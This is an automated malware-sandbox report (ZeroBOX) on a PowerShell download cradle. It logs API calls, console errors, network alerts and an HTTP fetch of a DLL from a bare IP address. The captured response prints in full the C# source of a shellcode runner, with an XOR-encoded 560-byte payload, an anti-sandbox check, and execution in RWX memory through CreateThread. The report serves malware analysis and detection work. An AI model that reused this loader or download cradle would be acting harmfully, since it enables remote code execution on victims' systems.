Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 28, 2025, 8:57 a.m.	April 28, 2025, 9:03 a.m.

Size	248.0B
Type	ASCII text
MD5	`bfe7652f5d2f9fee4948d1c055e40d7b`
SHA256	`a0e57df75b8b6acc6f9225dd5fa66c8ad3f46b17c77e7de015e84378928ae01e`
CRC32	`88B1A91B`
ssdeep	`6:0NpzX3oSgUUoqIiag1L3ppNolltWUXRR2juHTuAs:0X9RUo2agd3pjnUhRds`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\download_cradle.ps1
2552

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
15.160.116.14	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49164 -> 15.160.116.14:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW April 28, 2025, 8:57 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (26 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly console_handle: 0x00000023	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: '5282 bytes loaded from System.Management.Automation, Version=1.0.0.0, Culture console_handle: 0x0000002f	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: =neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An attem console_handle: 0x0000003b	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: pt was made to load a program with an incorrect format." console_handle: 0x00000047	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\download_cradle.ps1:2 char:44 console_handle: 0x00000053	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: + $assem = [System.Reflection.Assembly]::Load <<<< ($data) console_handle: 0x0000005f	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000006b	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000077	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x00000097	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\download_cradle.ps1:3 char:24 console_handle: 0x000000a3	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: + $class = $assem.GetType <<<< ("ClassLibrary1.Class1") console_handle: 0x000000af	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: + CategoryInfo : InvalidOperation: (GetType:String) [], RuntimeEx console_handle: 0x000000bb	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: ception console_handle: 0x000000c7	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: + FullyQualifiedErrorId : InvokeMethodOnNull console_handle: 0x000000d3	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x000000f3	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\download_cradle.ps1:4 char:27 console_handle: 0x000000ff	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: + $method = $class.GetMethod <<<< ("runner") console_handle: 0x0000010b	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: + CategoryInfo : InvalidOperation: (GetMethod:String) [], Runtime console_handle: 0x00000117	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: Exception console_handle: 0x00000123	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: + FullyQualifiedErrorId : InvokeMethodOnNull console_handle: 0x0000012f	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x0000014f	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\download_cradle.ps1:5 char:15 console_handle: 0x0000015b	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: + $method.Invoke <<<< (0, $null) console_handle: 0x00000167	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: + CategoryInfo : InvalidOperation: (Invoke:String) [], RuntimeExc console_handle: 0x00000173	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: eption console_handle: 0x0000017f	1	1
WriteConsoleW April 28, 2025, 8:57 a.m.	buffer: + FullyQualifiedErrorId : InvokeMethodOnNull console_handle: 0x0000018b	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey April 28, 2025, 8:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06001738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 8:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06001738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 8:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06001738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 8:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06001738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 8:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06001738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 8:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06001738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://15.160.116.14/Def.dll

Performs some HTTP requests (1 event)

request

GET http://15.160.116.14/Def.dll

Allocates read-write-execute memory (usually to unpack itself) (26 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0220b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01de9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05610000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02729000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06580000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06720000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06721000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06722000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06723000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06724000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06330000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06331000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06332000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06333000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06334000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054b8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 8:57 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06335000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by one AntiVirus engine on VirusTotal as malicious (1 event)

Symantec

ISB.Downloader!gen285

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 28, 2025, 8:57 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received

HTTP/1.1 200 OK Date: Mon, 28 Apr 2025 00:01:22 GMT Server: Apache/2.4.63 (Debian) Last-Modified: Sun, 23 Mar 2025 22:08:06 GMT ETag: "14a2-63109b8e3c78b" Accept-Ranges: bytes Content-Length: 5282 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program using System; using System.Runtime.InteropServices; namespace ClassLibrary1 { public class Class1 { [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [DllImport("kernel32.dll")] static extern uint WaitForSingleObject(IntPtr Handle, uint dwMilliseconds); [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect, uint nndPreferred); [DllImport("kernel32.dll")] static extern IntPtr GetCurrentProcess(); [DllImport("kernel32.dll")] static extern void Sleep(uint dwMilliseconds); public static void Main(string[] args) { // Appel de la mÃ©thode Runner runner(); } public static void runner() { IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0); if (mem == null) { return; } byte[] buf = new byte[560] { 0x41, 0x8d, 0xf1, 0xf9, 0xf5, 0x1a, 0x19, 0x56, 0x04, 0xdf, 0x57, 0xfd, 0xf3, 0xf9, 0xf4, 0x20, 0xac, 0x9a, 0xad, 0xe2, 0x55, 0x6d, 0xe2, 0x55, 0x6c, 0xcc, 0x2b, 0x95, 0x50, 0x79, 0xde, 0xad, 0x2a, 0x94, 0x19, 0xdf, 0x40, 0x41, 0x4c, 0x55, 0x4b, 0x42, 0x7e, 0x55, 0x55, 0x55, 0xb9, 0x19, 0x45, 0xf1, 0x3a, 0x5d, 0x49, 0x51, 0x75, 0xb9, 0xb9, 0xb9, 0xf8, 0xe8, 0xf8, 0xe9, 0xeb, 0xf1, 0x88, 0x6b, 0xe8, 0xef, 0xdc, 0xf1, 0x32, 0xeb, 0xd9, 0xf1, 0x32, 0xeb, 0xa1, 0xf1, 0x32, 0xeb, 0x99, 0xf1, 0x32, 0xcb, 0xe9, 0xf4, 0x88, 0x70, 0xf1, 0xb6, 0x0e, 0xf3, 0xf3, 0xf1, 0x88, 0x79, 0x15, 0x85, 0xd8, 0xc5, 0xbb, 0x95, 0x99, 0xf8, 0x78, 0x70, 0xb4, 0xf8, 0xb8, 0x78, 0x5b, 0x54, 0xeb, 0xf8, 0xe8, 0xf1, 0x32, 0xeb, 0x99, 0x32, 0xfb, 0x85, 0xf1, 0xb8, 0x69, 0xdf, 0x38, 0xc1, 0xa1, 0xb2, 0xbb, 0xb6, 0x3c, 0xcb, 0xb9, 0xb9, 0xb9, 0x32, 0x39, 0x31, 0xb9, 0xb9, 0xb9, 0xf1, 0x3c, 0x79, 0xcd, 0xde, 0xf1, 0xb8, 0x69, 0xfd, 0x32, 0xf9, 0x99, 0xf0, 0xb8, 0x69, 0x32, 0xf1, 0xa1, 0xe9, 0x5a, 0xef, 0xf1, 0x46, 0x70, 0xf4, 0x88, 0x70, 0xf8, 0x32, 0x8d, 0x31, 0xf1, 0xb8, 0x6f, 0xf1, 0x88, 0x79, 0xf8, 0x78, 0x70, 0xb4, 0x15, 0xf8, 0xb8, 0x78, 0x81, 0x59, 0xcc, 0x48, 0xf5, 0xba

Data received

, 0xf5, 0x9d, 0xb1, 0xfc, 0x80, 0x68, 0xcc, 0x61, 0xe1, 0xfd, 0x32, 0xf9, 0x9d, 0xf0, 0xb8, 0x69, 0xdf, 0xf8, 0x32, 0xb5, 0xf1, 0xfd, 0x32, 0xf9, 0xa5, 0xf0, 0xb8, 0x69, 0xf8, 0x32, 0xbd, 0x31, 0xf1, 0xb8, 0x69, 0xf8, 0xe1, 0xf8, 0xe1, 0xe7, 0xe0, 0xe3, 0xf8, 0xe1, 0xf8, 0xe0, 0xf8, 0xe3, 0xf1, 0x3a, 0x55, 0x99, 0xf8, 0xeb, 0x46, 0x59, 0xe1, 0xf8, 0xe0, 0xe3, 0xf1, 0x32, 0xab, 0x50, 0xf2, 0x46, 0x46, 0x46, 0xe4, 0xf0, 0x07, 0xce, 0xca, 0x8b, 0xe6, 0x8a, 0x8b, 0xb9, 0xb9, 0xf8, 0xef, 0xf0, 0x30, 0x5f, 0xf1, 0x38, 0x55, 0x19, 0xb8, 0xb9, 0xb9, 0xf0, 0x30, 0x5c, 0xf0, 0x05, 0xbb, 0xb9, 0xb8, 0x02, 0xb6, 0x19, 0xcd, 0xb7, 0xf8, 0xed, 0xf0, 0x30, 0x5d, 0xf5, 0x30, 0x48, 0xf8, 0x03, 0xf5, 0xce, 0x9f, 0xbe, 0x46, 0x6c, 0xf5, 0x30, 0x53, 0xd1, 0xb8, 0xb8, 0xb9, 0xb9, 0xe0, 0xf8, 0x03, 0x90, 0x39, 0xd2, 0xb9, 0x46, 0x6c, 0xd3, 0xb3, 0xf8, 0xe7, 0xe9, 0xe9, 0xf4, 0x88, 0x70, 0xf4, 0x88, 0x79, 0xf1, 0x46, 0x79, 0xf1, 0x30, 0x7b, 0xf1, 0x46, 0x79, 0xf1, 0x30, 0x78, 0xf8, 0x03, 0x53, 0xb6, 0x66, 0x59, 0x46, 0x6c, 0xf1, 0x30, 0x7e, 0xd3, 0xa9, 0xf8, 0xe1, 0xf5, 0x30, 0x5b, 0xf1, 0x30, 0x40, 0xf8, 0x03, 0x20, 0x1c, 0xcd, 0xd8, 0x46, 0x6c, 0x3c, 0x79, 0xcd, 0xb3, 0xf0, 0x46, 0x77, 0xcc, 0x5c, 0x51, 0x2a, 0xb9, 0xb9, 0xb9, 0xf1, 0x3a, 0x55, 0xa9, 0xf1, 0x30, 0x5b, 0xf4, 0x88, 0x70, 0xd3, 0xbd, 0xf8, 0xe1, 0xf1, 0x30, 0x40, 0xf8, 0x03, 0xbb, 0x60, 0x71, 0xe6, 0x46, 0x6c, 0x3a, 0x41, 0xb9, 0xc7, 0xec, 0xf1, 0x3a, 0x7d, 0x99, 0xe7, 0x30, 0x4f, 0xd3, 0xf9, 0xf8, 0xe0, 0xd1, 0xb9, 0xa9, 0xb9, 0xb9, 0xf8, 0xe1, 0xf1, 0x30, 0x4b, 0xf1, 0x88, 0x70, 0xf8, 0x03, 0xe1, 0x1d, 0xea, 0x5c, 0x46, 0x6c, 0xf1, 0x30, 0x7a, 0xf0, 0x30, 0x7e, 0xf4, 0x88, 0x70, 0xf0, 0x30, 0x49, 0xf1, 0x30, 0x63, 0xf1, 0x30, 0x40, 0xf8, 0x03, 0xbb, 0x60, 0x71, 0xe6, 0x46, 0x6c, 0x3a, 0x41, 0xb9, 0xc4, 0x91, 0xe1, 0xf8, 0xee, 0xe0, 0xd1, 0xb9, 0xf9, 0xb9, 0xb9, 0xf8, 0xe1, 0xd3, 0xb9, 0xe3, 0xf8, 0x03, 0xb2, 0x96, 0xb6, 0x89, 0x46, 0x6c, 0xee, 0xe0, 0xf8, 0x03, 0xcc, 0xd7, 0xf4, 0xd8, 0x46, 0x6c, 0xf0, 0x46, 0x77, 0x50, 0x85, 0x46, 0x46, 0x46, 0xf1, 0xb8, 0x7a, 0xf1, 0x90, 0x7f, 0xf1, 0x3c, 0x4f, 0xcc, 0x0d, 0xf8, 0x46, 0x5e, 0xe1, 0xd3, 0xb9, 0xe0, 0xf0, 0x7e, 0x7b, 0x49, 0x0c, 0x1b, 0xef, 0x46, 0x6c, 0x50, 0x79, }; for (int i = 0; i < buf.Length; i++) { buf[i] = (byte)(((uint)buf[i] ^ 0xAA) & 0xFF); } int size = buf.Length; IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40); Marshal.Copy(buf, 0, addr, size); IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); WaitForSingleObject(hThread, 0xFFFFFFFF); } } }

Poweshell is sending data to a remote host (1 event)

Data sent

GET /Def.dll HTTP/1.1 Host: 15.160.116.14 Connection: Keep-Alive

Communicates with host for which no DNS query was performed (1 event)

host

15.160.116.14

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send April 28, 2025, 8:57 a.m.	buffer: GET /Def.dll HTTP/1.1 Host: 15.160.116.14 Connection: Keep-Alive socket: 1536 sent: 70	1	70	0

download_cradle.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All